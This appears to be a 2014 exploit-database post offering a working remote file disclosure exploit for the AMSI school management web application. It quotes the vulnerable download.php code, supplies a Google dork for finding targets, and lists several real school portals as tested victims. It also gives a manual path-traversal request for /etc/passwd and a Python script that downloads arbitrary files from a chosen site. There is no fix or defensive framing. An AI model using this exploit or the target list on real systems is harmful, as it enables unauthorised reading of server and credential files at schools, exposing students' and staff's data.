Home / exploits AMSI 3.20.47 Build 37 File Disclosure
Posted on 24 December 2014
.__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ | Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \_____ | __)_ / / / | \ \____ /_______ //_______ / \______ / / / / AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] Exploit Developed by : B3mB4m [~] HomePage : http://h4x0resec.blogspot.com [~] Guzel Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : AMSI ( Academia management solutions international ) |~Affected Version : v3.20.47 build 37 |~Software : http://amsi.ae - http://iconnect.ae |~RISK : Medium |~Google Keyword/Dork : inurl:"?load=news/search_news" |~Tested On : [L] Kali Linux [R] example sites ####################INFO################################ makes it possible to read all the files from the local base. ####################################################### ### Error Line in 'download.php' ## .. $path = str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']); // $path = $_GET['file']; header("Content-Description: File Transfer"); header("Content-Type: application/force-download"); //header("Content-Disposition: attachment; filename=" . basename($path . $uri[1])); header("Content-Disposition: attachment; filename="" . basename($path . $uri[1]) . """ ); @readfile($path); .. ######################################################## Example and tested on; http://portal.iconnect.ae/ http://demo.iconnect.ae/ http://barsha.almawakeb.sch.ae/ http://portal.naischool.ae/ http://portal.ias-dubai.ae/ http://portal.madarschool.ae/ http://portal.isas.sch.ae/ http://portal.alsanawbarschool.com/ http://fia.fischools.com/ http://portal.ajyal.sch.ae/ http://portal.arabunityschool.com/ http://alnashaa.sch.ae/ http://portal.aaess.com/ ############################################################ Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd ############################################################ =========Automatic File Source Downloader Exploit ======== ##################### exploit.py ############################## # Coded by b3mb4m import random import os import urllib class B3mB4m(object): def example(self): print """ How to use ? Website: http://VICTIM.com Path : /download.php?file=../../../../etc/passwd """ def exploit(self): ask = raw_input("Website :") uz = raw_input("Path : ") #ask = "http://alnashaa.sch.ae" #uz = "/download.php?file=../../../../etc/passwd" uniq = str(random.randrange(1,1000+1))+".txt" filee = ask+uz try: urllib.urlretrieve(filee, uniq); print " Download complate ! " os.startfile(uniq) except: B3mB4m().example() if __name__ == '__main__': B3mB4m().exploit()
